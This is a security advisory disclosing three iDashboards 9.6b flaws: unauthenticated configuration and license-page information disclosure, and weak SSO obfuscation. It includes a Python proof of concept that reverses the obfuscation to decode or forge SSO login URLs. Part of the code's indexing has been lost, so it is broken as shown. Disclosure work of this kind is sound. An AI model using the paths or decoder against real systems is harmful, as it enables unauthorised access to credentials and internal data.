iDashboards 9.6b, Multiple Vulnerabilities
# Authors: Andrea Ferraris, Raffaele Forte
# Vendor Homepage: https://www.idashboards.com/
# Version: 9.6b and earlier
iDashboard is a closed-source system that allows to visualize data in form of graph.
The web application suffers from multiple vulnerabilities.
1. Sensitive Data Exposure
Using specific paths an unauthenticated user can obtain various information about the system.
a. Configuration Disclosure (CVE-2018-7209)
Using this URL “https://<url>/idashboards/config.xml” it is possible to obtain information such as version, url, etc.:
[...] <serverURL>/idashboards/idb?CMD=$C$</serverURL> <dashReportURL>/idashboards/idb/reports/prep/d/$DASH_ID$/$FORMAT$/$INLINE$/</dashReportURL> <chartReportURL>/idashboards/idb/reports/prep/c/$CHART_ID$-$DASH_ID$/$FORMAT$/$INLINE$/</chartReportURL> <serverRoot>/idashboards/</serverRoot> [...] <version>9.6b</version> <productID>9.6b-181217101653-160.45</productID> <companyName>XXX snc | XXX </companyName> [...] <adminUrl>http://XXXXXXX:6700/idashboards/admin/</adminUrl> [...]
b. License information disclosure (CVE-2018-7210)
In order to install the license in the application, the administrator should go to “https://<url>/idb/config?CMD=installLicense”.
If the license is already applied, this page is reachable from unauthenticated user. In this case, an attacker can obtain information about the system (type of license, internal IP address, ecc.) and guest accounts (if present):
Licensed to: XXX snc License expires: Never Licensed CPUs: Unlimited Number of named users: 51 Number of concurrent users: 51 Guest users: guest Licensed IP Addresses: 10.1.1.7 Licensed Domain(s): Server Name: XXXDASHBOARDS Server IP Address: 10.1.1.7 Server CPUs: 8 License type: XXX-XX-XXXX
2. Reverse engineering of SSO obfuscation (CVE-2018-7211)
As AdminManual said the SSO obfuscation is weak:
The iDashboards obfuscation library uses a proprietary, weak two-way encryption algorithm to obfuscate text. It is possible that a resourceful attacker could reverse-engineer the algorithm and use it to obfuscate SSO login URLs, or decode obfuscated ones. Moreover, anyone with access to the idb_encrypt.jar file or idb_encrypt.dll, and the proper knowledge, could use it to obfuscate SSO login URLs.
It is possible to reverse engineering the algorithm as we can see in the PoC below:
import sys def encrypt(string): i=0 out="" for c in string: power=pow(2,i) if power == 256: i=0 power=pow(2,i) i+=1 val=ord(c) k=val // power if k % 2 == 0: val+=power else: val-=power out+=str(hex(val)).replace('0x','') #print "Power:"+str(power)+" - Before:"+str(hex(ord(c)))+" - After:"+str(hex(val)) return out def decrypt(string): i=0 k=0 array= l=len(string)-1 while k < l: array.append(int(string[k:k+2],16)) k+=2 out="" for c in array: power=pow(2,i) if power == 256: i=0 power=pow(2,i) i+=1 val=c k=val // power if k % 2 == 0: val+=power else: val-=power out+=chr(val) #print "Power:"+str(power)+" - Before:"+str(hex(c))+" - After:"+str(hex(val))+ " - Char:"+chr(val) return out def main(args): if len(args)<3: print "Usage: "+args+ " " +" string" return if args == 'd': o=decrypt(args) elif args == 'e': o=encrypt(args) print o if __name__=='__main__': main(sys.argv)
IV. BUSINESS IMPACT
These flaws may compromise the integrity of the system and/or expose sensitive information.
Moreover, SSO reverse engineer allows to obtain user and password with a MiTM position.
V. SYSTEMS AFFECTED
iDashboard v9.6b is vulnerable (probably all previous versions)
VI. VULNERABILITY HISTORY
January 30th, 2018: Vulnerability identification
February 16th, 2018: Vendor notification
February 18th, 2018: CVE-ID reserved
VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.